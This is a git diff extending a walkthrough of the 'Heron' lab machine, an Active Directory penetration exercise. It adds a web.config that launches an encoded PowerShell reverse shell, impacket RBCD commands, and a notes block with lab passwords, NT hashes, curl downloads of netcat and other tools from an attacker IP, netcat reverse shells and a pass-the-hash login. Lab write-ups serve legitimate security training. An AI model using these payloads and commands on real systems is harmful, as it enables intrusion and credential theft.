Update Heron.md

Vulnlab/Heron.md

@@ -86,14 +86,151 @@ proxychains  nxc smb 10.10.196.37 -u 'samuel.davies' -p 'pass' -M gpp_password
 
 <img src="https://i.imgur.com/8tWxHyt.png"/>
 
-Checking the access on smb shares with svc-web-account-d, there's write access on accounting share
+Checking the access on smb shares with svc-web-accounting-d, there's write access on accounting share
 
 <img src="https://i.imgur.com/jdFb9mk.png"/>
-The accounting share has the application files including the web.config 
+The accounting share has the application files including the `web.config `
 
 <img src="https://i.imgur.com/j3gUK7E.png"/>
 
+Since we have write access to web.config we can edit that and  execute system commands through `AspNetCoreModule` but this method is destructive as it replaces the config file and can cause application to not function as in this scenario the application is working through the use of AccountingApp.dll in the config file 
+
+<img src="https://i.imgur.com/dTVXLD7.png"/>
+
+But before we attempt this we need to first figure out where config is being hosted as from the previous website we found it wasn't there, from the share name this hints us to use `accounting` as vhost
+
+<img src="https://i.imgur.com/bByZgdr.png"/>
+
+This site will ask for credentials where svc-web-accounting-d's creds will work
+
+<img src="https://i.imgur.com/oroItJF.png"/>
+
+The data here was being reflected from the dll which can be analyzed by either ILSpy or DNSpy
+
+<img src="https://i.imgur.com/OkfJX09.png"/>
+
+<img src="https://i.imgur.com/aWJhGak.png"/>
+
+Following this article https://soroush.me/blog/tag/rce/, to replace the path with any which does not exist, changing the processpath to be powershell and in the arguments placing base64 encoded reverse shell to receive on  jump server
+
+<img src="https://i.imgur.com/kacFSP8.png"/>
+
+<img src="https://i.imgur.com/vyCERnC.png"/>
+
+
+```
+<?xml version="1.0" encoding="utf-8"?>  
+<configuration>  
+  <location path="." inheritInChildApplications="false">  
+    <system.webServer>  
+      <handlers>  
+        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />  
+      </handlers>  
+      <aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAxADMANgAiACwAMgAyADIAMgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />  
+    </system.webServer>  
+  </location>  
+</configuration>  
+<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
+```
+
+Now deleting the web.config and replacing it with our modified one then making a request to the webpage with `/execute.now`
+
+
+<img src="https://i.imgur.com/e4jyVYY.png"/>
+
+<img src="https://i.imgur.com/IYDQCas.png"/>
+<img src="https://i.imgur.com/m9qh793.png"/>
+
+After getting a shell, running bloodhound to enumerate the domain
+
+```
+proxychains bloodhound-python -d 'heron.vl' -u 'svc-web-accounting-d' -p 'password'  -c all -ns 10.10.237.21
+```
+
+<img src="https://i.imgur.com/F7raG3r.png"/>
+
+But from bloodhound, it didn't showed any path leading to privilege escalation/lateral movement
+
+<img src="https://i.imgur.com/yUElxoT.png"/>
+
+Enumerating C:\Windows, we'll find `scripts` folder which is unusal to be there, ssh. ps1 file 
+having creentials to` _local ` user 
+
+<img src="https://i.imgur.com/GiXw3j2.png"/>
+
+Switching to user and escalating privileges to root user
+
+<img src="https://i.imgur.com/Rsjmyvy.png"/>
+
+From here we can only do much about reading the NThash of frajmp from /etc/krb5.keytab 
+
+<img src="https://i.imgur.com/DFlX3c7.png"/>
+
+Since we have password of ` _local`, we can try password spraying on domain users which will work on `Julian.Pratt`
+
+<img src="https://i.imgur.com/OY5Jk22.png"/>
+
+We can't login directly on domain controller since it requires non admins to be in remote desktop group, home directory can be access through `home$` share
+
+<img src="https://i.imgur.com/LBQs4SY.png"/>
+
+From here we can grab the shortcut files for putty sessions from where we'll get the password of `adm_prju`
+
+<img src="https://i.imgur.com/bb5nLeh.png"/>
+
+Checking for paths for gaining domain, this user is in `Admins_T1` group which has `WriteAccountRestrictions` acl on domain controller, which essentially is similar to GenericWrite or WriteProperty that can allow to edit `msDS-AllowedToActOnBehalfOfOtherIdentity` adding a machine account for which we have password for abusing resource based delegaiton (RBCD)
+
+<img src="https://i.imgur.com/Yb1qjnq.png"/>
+
+We can do this attack in two ways, since we have the NThash of frajmp, we can append that account in dc's property or we can utilize a user account without having any SPN by replacing the password with it's TGT session and combining S4U2Self and U2U protocols to abuse but this method is quite destructive and must be avoided only if there's a test account
+
+Going with the machine account approach, by first editing the property
+
+```bash
+ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip '10.10.153.149' -action 'write' 'heron.vl'/'adm_prju':'passowrd'
+```
+
+<img src="https://i.imgur.com/5JTpH30.png"/>
+
+```bash
+proxychains impacket-getST -spn 'cifs/MUCDC' -impersonate _admin -dc-ip '10.10.153.149' 'heron.vl/frajmp$' -hashes ':hash'
+```
+
+<img src="https://i.imgur.com/pwST8pB.png"/>
+
+<img src="https://i.imgur.com/3evqV6D.png"/>
+
+
+
 # References
 
 - https://www.hackingarticles.in/credential-dumping-group-policy-preferences-gpp/
 - https://github.com/t0thkr1s/gpp-decrypt
+- https://soroush.me/blog/tag/rce/
+- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+- https://github.com/sosdave/KeyTabExtract
+
+```
+pentest:Heron123!
+samuel.davies:l6fkiy9oN
+svc-web-accounting-d:H3r0n2024#!
+_local:Deplete5DenialDealt
+Julian.Pratt:Deplete5DenialDealt
+curl 10.8.0.136:8080/nc64.exe -o nc.exe
+curl 10.8.0.136/winPEASx64.exe -o win.exe
+.\nc.exe 10.8.0.136 3333 -e cmd.exe
+
+curl 10.8.0.136/RunasCs.exe -o RunasCs.exe
+.\RunasCs.exe  Julian.Pratt 'Deplete5DenialDealt' -d heron.vl 'C:\webaccounting\nc.exe 10.8.0.136 3333 -e cmd.exe' -l 9
+
+FRAJMP$:6f55b3b443ef192c804b2ae98e8254f7
+
+Set-ADComputer MUCJMP -PrincipalsAllowedToDelegateToAccount FRAJMP$
+Get-ADComputer MUCJMP -Properties PrincipalsAllowedToDelegateToAccount
+
+adm_prju@mucjmp:ayDMWV929N9wAiB4&
+
+evil-winrm -i 10.10.217.85 -u _admin -H 3998cdd28f164fa95983caf1ec603938
+
+
+```